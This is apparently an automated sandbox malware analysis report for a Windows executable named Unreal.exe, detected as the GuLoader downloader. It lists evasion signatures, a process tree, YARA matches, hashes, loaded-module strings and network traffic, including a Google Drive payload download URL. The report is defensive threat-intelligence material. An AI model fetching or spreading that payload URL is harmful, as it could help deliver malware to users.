Play interactive tour

Edit tour

Windows Analysis Report Unreal.exe

Overview

General Information

Sample Name:	Unreal.exe
Analysis ID:	1375
MD5:	35a93d1f2edc044b3d8289abfeb17a43
SHA1:	c29f2524ae4bd239c849720b1fc6ce5c13bee93b
SHA256:	88d3b3a6564e25b63b31f4a00361384fd294f228763b3bde4e3162144971d385
Infos:
Most interesting Screenshot:

Detection

GuLoader

Score:	100
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Found malware configuration

Multi AV Scanner detection for submitted file

Antivirus / Scanner detection for submitted sample

GuLoader behavior detected

Yara detected GuLoader

Hides threads from debuggers

Writes to foreign memory regions

Tries to detect Any.run

Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)

C2 URLs / IPs found in malware configuration

Uses 32bit PE files

Antivirus or Machine Learning detection for unpacked file

One or more processes crash

May sleep (evasive loops) to hinder dynamic analysis

Uses code obfuscation techniques (call, push, ret)

Detected potential crypto function

Sample execution stops while process was sleeping (likely an evasion)

JA3 SSL client fingerprint seen in connection with other malware

Contains functionality to call native functions

Contains functionality for execution timing, often used to detect debuggers

Abnormal high CPU Usage

Creates a DirectInput object (often for capturing keystrokes)

PE file contains strange resources

Tries to load missing DLLs

Contains functionality to read the PEB

Uses a known web browser user agent for HTTP communication

Checks if the current process is being debugged

Creates a process in suspended mode (likely to inject code)

Classification

Process Tree

System is w10x64native

Unreal.exe (PID: 5360 cmdline: 'C:\Users\user\Desktop\Unreal.exe' MD5: 35A93D1F2EDC044B3D8289ABFEB17A43)

RegAsm.exe (PID: 6992 cmdline: 'C:\Users\user\Desktop\Unreal.exe' MD5: A64DACA3CFBCD039DF3EC29D3EDDD001)

conhost.exe (PID: 7000 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68)

WerFault.exe (PID: 3316 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 6992 -s 1260 MD5: 40A149513D721F096DDF50C04DA2F01F)

cleanup

Malware Configuration

Threatname: GuLoader

{"Payload URL": "https://drive.google.com/uc?export=dow"}

Yara Overview

Memory Dumps

Source	Rule	Description	Author
00000005.00000000.18420827212.00000000011A0000.00000040.00000001.sdmp	JoeSecurity_GuLoader_2	Yara detected GuLoader	Joe Security
00000005.00000000.18430470714.00000000011A0000.00000040.00000001.sdmp	JoeSecurity_GuLoader_2	Yara detected GuLoader	Joe Security
00000005.00000002.18569185029.00000000011A0000.00000040.00000001.sdmp	JoeSecurity_GuLoader_2	Yara detected GuLoader	Joe Security

Sigma Overview

No Sigma rule has matched

Jbx Signature Overview

Click to jump to signature section

Show All Signature Results

AV Detection:

Found malware configuration

Show sources

Source: Unreal.exe

Malware Configuration Extractor: GuLoader {"Payload URL": "https://drive.google.com/uc?export=dow"}

Multi AV Scanner detection for submitted file

Show sources

Source: Unreal.exe	Virustotal: Detection: 41%			Perma Link
Source: Unreal.exe	ReversingLabs: Detection: 13%

Antivirus / Scanner detection for submitted sample

Show sources

Source: Unreal.exe

Avira: detected

Source: 1.0.Unreal.exe.400000.0.unpack

Avira: Label: TR/AD.Nekark.hrjdi

Source: Unreal.exe

Static PE information: LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, RELOCS_STRIPPED

Source: unknown

HTTPS traffic detected: 142.250.185.142:443 -> 192.168.11.20:49787 version: TLS 1.2

Source:	Binary string: CLBCatQ.pdb( source: WerFault.exe, 00000013.00000003.18468036475.00000000060AA000.00000004.00000001.sdmp
Source:	Binary string: rsaenh.pdb source: WerFault.exe, 00000013.00000003.18488731402.0000000006900000.00000004.00000001.sdmp
Source:	Binary string: cfgmgr32.pdb( source: WerFault.exe, 00000013.00000003.18448355203.0000000000514000.00000004.00000001.sdmp
Source:	Binary string: profapi.pdb( source: WerFault.exe, 00000013.00000003.18457584237.0000000005C93000.00000004.00000001.sdmp
Source:	Binary string: wkernel32.pdb source: WerFault.exe, 00000013.00000003.18445876276.00000000004D5000.00000004.00000001.sdmp
Source:	Binary string: sfc_os.pdb source: WerFault.exe, 00000013.00000003.18511530246.00000000048F8000.00000004.00000040.sdmp
Source:	Binary string: bcrypt.pdb source: WerFault.exe, 00000013.00000003.18511530246.00000000048F8000.00000004.00000040.sdmp
Source:	Binary string: ucrtbase.pdb source: WerFault.exe, 00000013.00000003.18511530246.00000000048F8000.00000004.00000040.sdmp
Source:	Binary string: mskeyprotect.pdb source: WerFault.exe, 00000013.00000003.18487893314.00000000064AA000.00000004.00000001.sdmp
Source:	Binary string: msvcrt.pdb source: WerFault.exe, 00000013.00000003.18511463189.00000000048F0000.00000004.00000040.sdmp
Source:	Binary string: RegAsm.pdb source: WerFault.exe, 00000013.00000003.18448402529.000000000044A000.00000004.00000001.sdmp
Source:	Binary string: wrpcrt4.pdb source: WerFault.exe, 00000013.00000003.18511530246.00000000048F8000.00000004.00000040.sdmp
Source:	Binary string: dnsapi.pdb8 source: WerFault.exe, 00000013.00000003.18511530246.00000000048F8000.00000004.00000040.sdmp
Source:	Binary string: wntdll.pdb source: WerFault.exe, 00000013.00000003.18511463189.00000000048F0000.00000004.00000040.sdmp
Source:	Binary string: msvcrt.pdb\ source: WerFault.exe, 00000013.00000003.18511463189.00000000048F0000.00000004.00000040.sdmp
Source:	Binary string: bcrypt.pdb! source: WerFault.exe, 00000013.00000003.18511530246.00000000048F8000.00000004.00000040.sdmp
Source:	Binary string: winnsi.pdb source: WerFault.exe, 00000013.00000003.18461903158.0000000005CC7000.00000004.00000001.sdmp
Source:	Binary string: iCLBCatQ.pdb source: WerFault.exe, 00000013.00000003.18450568195.0000000005161000.00000004.00000001.sdmp
Source:	Binary string: cryptsp.pdb source: WerFault.exe, 00000013.00000003.18492583538.00000000064CC000.00000004.00000001.sdmp
Source:	Binary string: shcore.pdbE source: WerFault.exe, 00000013.00000003.18511530246.00000000048F8000.00000004.00000040.sdmp
Source:	Binary string: srvcli.pdb, source: WerFault.exe, 00000013.00000003.18511530246.00000000048F8000.00000004.00000040.sdmp
Source:	Binary string: advapi32.pdb source: WerFault.exe, 00000013.00000003.18458800581.00000000058B4000.00000004.00000001.sdmp
Source:	Binary string: wsspicli.pdb source: WerFault.exe, 00000013.00000003.18511530246.00000000048F8000.00000004.00000040.sdmp
Source:	Binary string: ucrtbase.pdb( source: WerFault.exe, 00000013.00000003.18448322350.000000000050D000.00000004.00000001.sdmp
Source:	Binary string: qncryptsslp.pdb source: WerFault.exe, 00000013.00000003.18452058007.0000000005CA4000.00000004.00000001.sdmp
Source:	Binary string: bcrypt.pdb( source: WerFault.exe, 00000013.00000003.18448382320.000000000051A000.00000004.00000001.sdmp
Source:	Binary string: msi.pdb source: WerFault.exe, 00000013.00000003.18511530246.00000000048F8000.00000004.00000040.sdmp
Source:	Binary string: CLBCatQ.pdb source: WerFault.exe, 00000013.00000003.18468036475.00000000060AA000.00000004.00000001.sdmp
Source:	Binary string: urlmon.pdb source: WerFault.exe, 00000013.00000003.18478792357.0000000005CCD000.00000004.00000001.sdmp
Source:	Binary string: schannel.pdb source: WerFault.exe, 00000013.00000003.18487856720.00000000064A5000.00000004.00000001.sdmp
Source:	Binary string: winspool.pdb( source: WerFault.exe, 00000013.00000003.18456898801.0000000005898000.00000004.00000001.sdmp
Source:	Binary string: WLDP.pdb( source: WerFault.exe, 00000013.00000003.18457560822.0000000005C8E000.00000004.00000001.sdmp
Source:	Binary string: wkernelbase.pdb source: WerFault.exe, 00000013.00000003.18445925646.00000000004DB000.00000004.00000001.sdmp
Source:	Binary string: shlwapi.pdb source: WerFault.exe, 00000013.00000003.18511530246.00000000048F8000.00000004.00000040.sdmp
Source:	Binary string: mpr.pdb source: WerFault.exe, 00000013.00000003.18511530246.00000000048F8000.00000004.00000040.sdmp
Source:	Binary string: wkernel32.pdb\ source: WerFault.exe, 00000013.00000003.18511463189.00000000048F0000.00000004.00000040.sdmp
Source:	Binary string: urlmon.pdb( source: WerFault.exe, 00000013.00000003.18478792357.0000000005CCD000.00000004.00000001.sdmp
Source:	Binary string: RegAsm.pdb( source: WerFault.exe, 00000013.00000003.18448402529.000000000044A000.00000004.00000001.sdmp
Source:	Binary string: cryptbase.pdb( source: WerFault.exe, 00000013.00000003.18491865404.000000000695B000.00000004.00000001.sdmp
Source:	Binary string: mscoree.pdb\ source: WerFault.exe, 00000013.00000003.18511463189.00000000048F0000.00000004.00000040.sdmp
Source:	Binary string: cryptsp.pdb( source: WerFault.exe, 00000013.00000003.18492583538.00000000064CC000.00000004.00000001.sdmp
Source:	Binary string: srvcli.pdb source: WerFault.exe, 00000013.00000003.18511530246.00000000048F8000.00000004.00000040.sdmp
Source:	Binary string: mscoree.pdb source: WerFault.exe, 00000013.00000003.18511463189.00000000048F0000.00000004.00000040.sdmp
Source:	Binary string: wintrust.pdbl source: WerFault.exe, 00000013.00000003.18511530246.00000000048F8000.00000004.00000040.sdmp
Source:	Binary string: ws2_32.pdb source: WerFault.exe, 00000013.00000003.18452058007.0000000005CA4000.00000004.00000001.sdmp
Source:	Binary string: advapi32.pdb( source: WerFault.exe, 00000013.00000003.18458800581.00000000058B4000.00000004.00000001.sdmp
Source:	Binary string: winspool.pdb source: WerFault.exe, 00000013.00000003.18511530246.00000000048F8000.00000004.00000040.sdmp
Source:	Binary string: ncrypt.pdb~ source: WerFault.exe, 00000013.00000003.18511530246.00000000048F8000.00000004.00000040.sdmp
Source:	Binary string: gpapi.pdb( source: WerFault.exe, 00000013.00000003.18495320806.00000000069B5000.00000004.00000001.sdmp
Source:	Binary string: iphlpapi.pdb source: WerFault.exe, 00000013.00000003.18461838493.0000000005CBC000.00000004.00000001.sdmp
Source:	Binary string: dpapi.pdb( source: WerFault.exe, 00000013.00000003.18461019578.00000000064C1000.00000004.00000001.sdmp
Source:	Binary string: wmswsock.pdb( source: WerFault.exe, 00000013.00000003.18474782981.0000000005CB6000.00000004.00000001.sdmp
Source:	Binary string: nsi.pdb source: WerFault.exe, 00000013.00000003.18511282417.00000000047F1000.00000004.00000001.sdmp
Source:	Binary string: wsspicli.pdbc source: WerFault.exe, 00000013.00000003.18511530246.00000000048F8000.00000004.00000040.sdmp
Source:	Binary string: gpapi.pdb source: WerFault.exe, 00000013.00000003.18511530246.00000000048F8000.00000004.00000040.sdmp
Source:	Binary string: rsaenh.pdb( source: WerFault.exe, 00000013.00000003.18488731402.0000000006900000.00000004.00000001.sdmp
Source:	Binary string: wwin32u.pdb( source: WerFault.exe, 00000013.00000003.18448223479.00000000004F7000.00000004.00000001.sdmp
Source:	Binary string: ole32.pdb source: WerFault.exe, 00000013.00000003.18467435547.00000000058BF000.00000004.00000001.sdmp
Source:	Binary string: WLDP.pdb[ source: WerFault.exe, 00000013.00000003.18511530246.00000000048F8000.00000004.00000040.sdmp
Source:	Binary string: AcLayers.pdb source: WerFault.exe, 00000013.00000003.18445975471.00000000004E6000.00000004.00000001.sdmp
Source:	Binary string: i.pdb~ source: WerFault.exe, 00000013.00000003.18447539497.00000000050EF000.00000004.00000001.sdmp
Source:	Binary string: iertutil.pdb source: WerFault.exe, 00000013.00000003.18457451856.0000000005C77000.00000004.00000001.sdmp
Source:	Binary string: wimm32.pdbm source: WerFault.exe, 00000013.00000003.18511530246.00000000048F8000.00000004.00000040.sdmp
Source:	Binary string: netutils.pdb" source: WerFault.exe, 00000013.00000003.18511530246.00000000048F8000.00000004.00000040.sdmp
Source:	Binary string: msasn1.pdb source: WerFault.exe, 00000013.00000003.18460988044.00000000064BB000.00000004.00000001.sdmp
Source:	Binary string: cfgmgr32.pdb source: WerFault.exe, 00000013.00000003.18511530246.00000000048F8000.00000004.00000040.sdmp
Source:	Binary string: combase.pdb source: WerFault.exe, 00000013.00000003.18447678008.000000000515A000.00000004.00000001.sdmp
Source:	Binary string: Windows.Storage.pdb source: WerFault.exe, 00000013.00000003.18461462340.0000000005C88000.00000004.00000001.sdmp
Source:	Binary string: wuser32.pdb( source: WerFault.exe, 00000013.00000003.18446070364.00000000004F1000.00000004.00000001.sdmp
Source:	Binary string: iertutil.pdb( source: WerFault.exe, 00000013.00000003.18457451856.0000000005C77000.00000004.00000001.sdmp
Source:	Binary string: wkernel32.pdb( source: WerFault.exe, 00000013.00000003.18445876276.00000000004D5000.00000004.00000001.sdmp
Source:	Binary string: sfc.pdb source: WerFault.exe, 00000013.00000003.18511530246.00000000048F8000.00000004.00000040.sdmp
Source:	Binary string: ncrypt.pdb source: WerFault.exe, 00000013.00000003.18489031214.0000000006A11000.00000004.00000001.sdmp
Source:	Binary string: dpapi.pdb source: WerFault.exe, 00000013.00000003.18461019578.00000000064C1000.00000004.00000001.sdmp
Source:	Binary string: ole32.pdb3 source: WerFault.exe, 00000013.00000003.18511530246.00000000048F8000.00000004.00000040.sdmp
Source:	Binary string: profapi.pdbW source: WerFault.exe, 00000013.00000003.18511530246.00000000048F8000.00000004.00000040.sdmp
Source:	Binary string: apphelp.pdb source: WerFault.exe, 00000013.00000003.18511463189.00000000048F0000.00000004.00000040.sdmp
Source:	Binary string: wrpcrt4.pdbQ source: WerFault.exe, 00000013.00000003.18511530246.00000000048F8000.00000004.00000040.sdmp
Source:	Binary string: netutils.pdb( source: WerFault.exe, 00000013.00000003.18483510070.0000000006439000.00000004.00000001.sdmp
Source:	Binary string: shlwapi.pdbF source: WerFault.exe, 00000013.00000003.18511530246.00000000048F8000.00000004.00000040.sdmp
Source:	Binary string: ole32.pdb( source: WerFault.exe, 00000013.00000003.18467435547.00000000058BF000.00000004.00000001.sdmp
Source:	Binary string: shcore.pdb( source: WerFault.exe, 00000013.00000003.18453188291.0000000005C7D000.00000004.00000001.sdmp
Source:	Binary string: rasadhlp.pdb source: WerFault.exe, 00000013.00000003.18511530246.00000000048F8000.00000004.00000040.sdmp
Source:	Binary string: netutils.pdb source: WerFault.exe, 00000013.00000003.18483510070.0000000006439000.00000004.00000001.sdmp
Source:	Binary string: msvcp_win.pdb( source: WerFault.exe, 00000013.00000003.18448297037.0000000000508000.00000004.00000001.sdmp
Source:	Binary string: Kernel.Appcore.pdb( source: WerFault.exe, 00000013.00000003.18451945559.0000000005C99000.00000004.00000001.sdmp
Source:	Binary string: wininet.pdb source: WerFault.exe, 00000013.00000003.18455791748.00000000058C5000.00000004.00000001.sdmp
Source:	Binary string: wgdi32full.pdb( source: WerFault.exe, 00000013.00000003.18446219822.0000000000502000.00000004.00000001.sdmp
Source:	Binary string: shell32.pdb( source: WerFault.exe, 00000013.00000003.18447912395.0000000005149000.00000004.00000001.sdmp
Source:	Binary string: psapi.pdb' source: WerFault.exe, 00000013.00000003.18511530246.00000000048F8000.00000004.00000040.sdmp
Source:	Binary string: psapi.pdb( source: WerFault.exe, 00000013.00000003.18462073106.00000000058A9000.00000004.00000001.sdmp
Source:	Binary string: wntdll.pdb\ source: WerFault.exe, 00000013.00000003.18511463189.00000000048F0000.00000004.00000040.sdmp
Source:	Binary string: cryptsp.pdbx source: WerFault.exe, 00000013.00000003.18511530246.00000000048F8000.00000004.00000040.sdmp
Source:	Binary string: ncrypt.pdb( source: WerFault.exe, 00000013.00000003.18489031214.0000000006A11000.00000004.00000001.sdmp
Source:	Binary string: shcore.pdb source: WerFault.exe, 00000013.00000003.18453188291.0000000005C7D000.00000004.00000001.sdmp
Source:	Binary string: msasn1.pdb( source: WerFault.exe, 00000013.00000003.18460988044.00000000064BB000.00000004.00000001.sdmp
Source:	Binary string: ncryptsslp.pdb( source: WerFault.exe, 00000013.00000003.18484709355.0000000006A72000.00000004.00000001.sdmp
Source:	Binary string: shlwapi.pdb( source: WerFault.exe, 00000013.00000003.18447936998.000000000514F000.00000004.00000001.sdmp
Source:	Binary string: wininet.pdbO source: WerFault.exe, 00000013.00000003.18511530246.00000000048F8000.00000004.00000040.sdmp
Source:	Binary string: wgdi32.pdb source: WerFault.exe, 00000013.00000003.18511530246.00000000048F8000.00000004.00000040.sdmp
Source:	Binary string: oleaut32.pdb( source: WerFault.exe, 00000013.00000003.18450505858.0000000005154000.00000004.00000001.sdmp
Source:	Binary string: sechost.pdb= source: WerFault.exe, 00000013.00000003.18511530246.00000000048F8000.00000004.00000040.sdmp
Source:	Binary string: shell32.pdb source: WerFault.exe, 00000013.00000003.18447912395.0000000005149000.00000004.00000001.sdmp
Source:	Binary string: iertutil.pdby source: WerFault.exe, 00000013.00000003.18511530246.00000000048F8000.00000004.00000040.sdmp
Source:	Binary string: msvcp_win.pdb source: WerFault.exe, 00000013.00000003.18511530246.00000000048F8000.00000004.00000040.sdmp
Source:	Binary string: apphelp.pdb\ source: WerFault.exe, 00000013.00000003.18511463189.00000000048F0000.00000004.00000040.sdmp
Source:	Binary string: schannel.pdb( source: WerFault.exe, 00000013.00000003.18487856720.00000000064A5000.00000004.00000001.sdmp
Source:	Binary string: wimm32.pdb( source: WerFault.exe, 00000013.00000003.18456945964.00000000058A3000.00000004.00000001.sdmp
Source:	Binary string: dnsapi.pdb source: WerFault.exe, 00000013.00000003.18483084836.0000000006494000.00000004.00000001.sdmp
Source:	Binary string: wimm32.pdb source: WerFault.exe, 00000013.00000003.18456945964.00000000058A3000.00000004.00000001.sdmp
Source:	Binary string: winnsi.pdb( source: WerFault.exe, 00000013.00000003.18461903158.0000000005CC7000.00000004.00000001.sdmp
Source:	Binary string: wwin32u.pdb source: WerFault.exe, 00000013.00000003.18511530246.00000000048F8000.00000004.00000040.sdmp
Source:	Binary string: setupapi.pdb source: WerFault.exe, 00000013.00000003.18511530246.00000000048F8000.00000004.00000040.sdmp
Source:	Binary string: combase.pdb+ source: WerFault.exe, 00000013.00000003.18511530246.00000000048F8000.00000004.00000040.sdmp
Source:	Binary string: winhttp.pdb source: WerFault.exe, 00000013.00000003.18457749595.0000000005CB1000.00000004.00000001.sdmp
Source:	Binary string: Windows.Storage.pdb( source: WerFault.exe, 00000013.00000003.18461462340.0000000005C88000.00000004.00000001.sdmp
Source:	Binary string: ntasn1.pdb source: WerFault.exe, 00000013.00000003.18478327612.00000000064B0000.00000004.00000001.sdmp
Source:	Binary string: winhttp.pdb( source: WerFault.exe, 00000013.00000003.18457749595.0000000005CB1000.00000004.00000001.sdmp
Source:	Binary string: fwpuclnt.pdb( source: WerFault.exe, 00000013.00000003.18487821063.000000000649F000.00000004.00000001.sdmp
Source:	Binary string: OnDemandConnRouteHelper.pdb source: WerFault.exe, 00000013.00000003.18461715472.0000000005CAB000.00000004.00000001.sdmp
Source:	Binary string: combase.pdb( source: WerFault.exe, 00000013.00000003.18447678008.000000000515A000.00000004.00000001.sdmp
Source:	Binary string: wntdll.pdb( source: WerFault.exe, 00000013.00000003.18445660840.0000000000470000.00000004.00000001.sdmp
Source:	Binary string: profapi.pdb source: WerFault.exe, 00000013.00000003.18457584237.0000000005C93000.00000004.00000001.sdmp
Source:	Binary string: wgdi32full.pdb source: WerFault.exe, 00000013.00000003.18511530246.00000000048F8000.00000004.00000040.sdmp
Source:	Binary string: WLDP.pdb source: WerFault.exe, 00000013.00000003.18457560822.0000000005C8E000.00000004.00000001.sdmp
Source:	Binary string: sechost.pdb source: WerFault.exe, 00000013.00000003.18511530246.00000000048F8000.00000004.00000040.sdmp
Source:	Binary string: ncryptsslp.pdb source: WerFault.exe, 00000013.00000003.18484709355.0000000006A72000.00000004.00000001.sdmp
Source:	Binary string: wmswsock.pdb source: WerFault.exe, 00000013.00000003.18511530246.00000000048F8000.00000004.00000040.sdmp
Source:	Binary string: wkernelbase.pdb\ source: WerFault.exe, 00000013.00000003.18511463189.00000000048F0000.00000004.00000040.sdmp
Source:	Binary string: AcLayers.pdb\ source: WerFault.exe, 00000013.00000003.18511463189.00000000048F0000.00000004.00000040.sdmp
Source:	Binary string: wintrust.pdb source: WerFault.exe, 00000013.00000003.18479689483.00000000064C6000.00000004.00000001.sdmp
Source:	Binary string: mskeyprotect.pdb# source: WerFault.exe, 00000013.00000003.18511530246.00000000048F8000.00000004.00000040.sdmp
Source:	Binary string: crypt32.pdb( source: WerFault.exe, 00000013.00000003.18474081621.00000000064B6000.00000004.00000001.sdmp
Source:	Binary string: dnsapi.pdb( source: WerFault.exe, 00000013.00000003.18483084836.0000000006494000.00000004.00000001.sdmp
Source:	Binary string: Kernel.Appcore.pdb source: WerFault.exe, 00000013.00000003.18451945559.0000000005C99000.00000004.00000001.sdmp
Source:	Binary string: AcLayers.pdb( source: WerFault.exe, 00000013.00000003.18445975471.00000000004E6000.00000004.00000001.sdmp
Source:	Binary string: ntasn1.pdb( source: WerFault.exe, 00000013.00000003.18478327612.00000000064B0000.00000004.00000001.sdmp
Source:	Binary string: setupapi.pdbI source: WerFault.exe, 00000013.00000003.18511530246.00000000048F8000.00000004.00000040.sdmp
Source:	Binary string: psapi.pdb source: WerFault.exe, 00000013.00000003.18462073106.00000000058A9000.00000004.00000001.sdmp
Source:	Binary string: fwpuclnt.pdb source: WerFault.exe, 00000013.00000003.18487821063.000000000649F000.00000004.00000001.sdmp
Source:	Binary string: ws2_32.pdb( source: WerFault.exe, 00000013.00000003.18452058007.0000000005CA4000.00000004.00000001.sdmp
Source:	Binary string: cryptbase.pdb source: WerFault.exe, 00000013.00000003.18511530246.00000000048F8000.00000004.00000040.sdmp
Source:	Binary string: bcryptprimitives.pdb source: WerFault.exe, 00000013.00000003.18471982779.0000000005C9E000.00000004.00000001.sdmp
Source:	Binary string: wkernelbase.pdb( source: WerFault.exe, 00000013.00000003.18445925646.00000000004DB000.00000004.00000001.sdmp
Source:	Binary string: OnDemandConnRouteHelper.pdb( source: WerFault.exe, 00000013.00000003.18461715472.0000000005CAB000.00000004.00000001.sdmp
Source:	Binary string: iphlpapi.pdb( source: WerFault.exe, 00000013.00000003.18461838493.0000000005CBC000.00000004.00000001.sdmp
Source:	Binary string: oleaut32.pdb source: WerFault.exe, 00000013.00000003.18511530246.00000000048F8000.00000004.00000040.sdmp
Source:	Binary string: CLBCatQ.pdbu source: WerFault.exe, 00000013.00000003.18511530246.00000000048F8000.00000004.00000040.sdmp
Source:	Binary string: wuser32.pdb source: WerFault.exe, 00000013.00000003.18446070364.00000000004F1000.00000004.00000001.sdmp
Source:	Binary string: wininet.pdb( source: WerFault.exe, 00000013.00000003.18455791748.00000000058C5000.00000004.00000001.sdmp
Source:	Binary string: crypt32.pdb source: WerFault.exe, 00000013.00000003.18474081621.00000000064B6000.00000004.00000001.sdmp

Networking:

C2 URLs / IPs found in malware configuration

Show sources

Source: Malware configuration extractor

URLs: https://drive.google.com/uc?export=dow

Source: Joe Sandbox View

JA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19

Source: global traffic

HTTP traffic detected: GET /uc?export=download&id=1JZajQIQdUbLIFKGrWeKAj7F2g5cgApuC HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like GeckoHost: drive.google.comCache-Control: no-cache

Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49787
Source: unknown	Network traffic detected: HTTP traffic on port 49787 -> 443

Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1

Source: global traffic

HTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/html; charset=UTF-8x-chromium-appcache-fallback-override: disallow-fallbackP3P: CP="This is not a P3P policy! See g.co/p3phelp for more info."Content-Security-Policy: script-src 'nonce-zmJa6o19NNZGxnDADiVTMg' 'unsafe-inline' 'strict-dynamic' https: http: 'unsafe-eval';object-src 'none';base-uri 'self';report-uri https://csp.withgoogle.com/csp/drive-explorer/Date: Mon, 27 Sep 2021 18:54:19 GMTExpires: Mon, 27 Sep 2021 18:54:19 GMTCache-Control: private, max-age=0X-Content-Type-Options: nosniffX-Frame-Options: SAMEORIGINX-XSS-Protection: 1; mode=blockServer: GSESet-Cookie: NID=511=ODlPQgXqu4fdjG6ZuHTs0XNElZYDpXm1vg6AmQltuVvHl0JsiakjSgV63pH6LJnzsT27OHd1ZwOj3TF0GiES08RkNtz9RFmZ-4zBpdXmGWfyTjPaYTA5Duyff1r4XtXVZBFi2lZx3mEw_9SnPrYs2NcLj3JlA4yzX0915aFt1IY; expires=Tue, 29-Mar-2022 18:54:19 GMT; path=/; domain=.google.com; Secure; HttpOnly; SameSite=noneAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000,h3-T051=":443"; ma=2592000,h3-Q050=":443"; ma=2592000,h3-Q046=":443"; ma=2592000,h3-Q043=":443"; ma=2592000,quic=":443"; ma=2592000; v="46,43"Accept-Ranges: noneVary: Accept-EncodingConnection: closeTransfer-Encoding: chunked

Source: RegAsm.exe, 00000005.00000003.16058051974.0000000001357000.00000004.00000001.sdmp, WerFault.exe, 00000013.00000002.18566936937.0000000005899000.00000004.00000001.sdmp	String found in binary or memory: http://crl.comodoca.com/AAACertificateServices.crl06
Source: RegAsm.exe, 00000005.00000003.16058051974.0000000001357000.00000004.00000001.sdmp, WerFault.exe, 00000013.00000002.18561386183.0000000000503000.00000004.00000001.sdmp	String found in binary or memory: http://crl.globalsign.net/root-r2.crl0
Source: RegAsm.exe, 00000005.00000003.16058051974.0000000001357000.00000004.00000001.sdmp	String found in binary or memory: https://csp.withgoogle.com/csp/drive-explorer/
Source: RegAsm.exe, 00000005.00000002.18569479870.00000000012D8000.00000004.00000020.sdmp	String found in binary or memory: https://drive.google.com/
Source: RegAsm.exe, 00000005.00000002.18569996974.0000000001340000.00000004.00000020.sdmp, RegAsm.exe, 00000005.00000000.18431774300.0000000001530000.00000004.00000001.sdmp	String found in binary or memory: https://drive.google.com/uc?export=download&id=1JZajQIQdUbLIFKGrWeKAj7F2g5cgApuC
Source: RegAsm.exe, 00000005.00000002.18569479870.00000000012D8000.00000004.00000020.sdmp	String found in binary or memory: https://drive.google.com/uc?export=download&id=1JZajQIQdUbLIFKGrWeKAj7F2g5cgApuC&
Source: RegAsm.exe, 00000005.00000000.18421359517.0000000001320000.00000004.00000020.sdmp	String found in binary or memory: https://drive.google.com/uc?export=download&id=1JZajQIQdUbLIFKGrWeKAj7F2g5cgApuC2
Source: RegAsm.exe, 00000005.00000002.18569479870.00000000012D8000.00000004.00000020.sdmp	String found in binary or memory: https://drive.google.com/uc?export=download&id=1JZajQIQdUbLIFKGrWeKAj7F2g5cgApuCT(-

Source: unknown

DNS traffic detected: queries for: drive.google.com

Source: global traffic

Source: unknown

HTTPS traffic detected: 142.250.185.142:443 -> 192.168.11.20:49787 version: TLS 1.2

Source: WerFault.exe, 00000013.00000003.18447513597.00000000050AD000.00000004.00000001.sdmp

Binary or memory string: DWM8And16Bit_DirectDrawCreateEx_CallOut

Source: Unreal.exe

Static PE information: LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, RELOCS_STRIPPED

Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe

Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 6992 -s 1260

Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Code function: 5_2_011AA31F	5_2_011AA31F
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Code function: 5_2_011AFA0B	5_2_011AFA0B
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Code function: 5_2_011A7996	5_2_011A7996
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Code function: 5_2_011A000A	5_2_011A000A
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Code function: 5_2_011A7281	5_2_011A7281
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Code function: 5_2_011AE2B0	5_2_011AE2B0
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Code function: 5_2_011A9AA7	5_2_011A9AA7
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Code function: 5_2_011A0AC4	5_2_011A0AC4
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Code function: 5_2_011A9515	5_2_011A9515
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Code function: 5_2_011AE567	5_2_011AE567
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Code function: 5_2_011A95CB	5_2_011A95CB
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Code function: 5_2_011A9E3B	5_2_011A9E3B

Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Code function: 5_2_011AA31F NtAllocateVirtualMemory,LoadLibraryA,	5_2_011AA31F
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Code function: 5_2_011AF3D0 NtProtectVirtualMemory,	5_2_011AF3D0
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Code function: 5_2_011A9E3B NtAllocateVirtualMemory,	5_2_011A9E3B

Source: C:\Users\user\Desktop\Unreal.exe

Process Stats: CPU usage > 98%

Source: Unreal.exe

Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST

Source: C:\Users\user\Desktop\Unreal.exe	Section loaded: edgegdi.dll	Jump to behavior
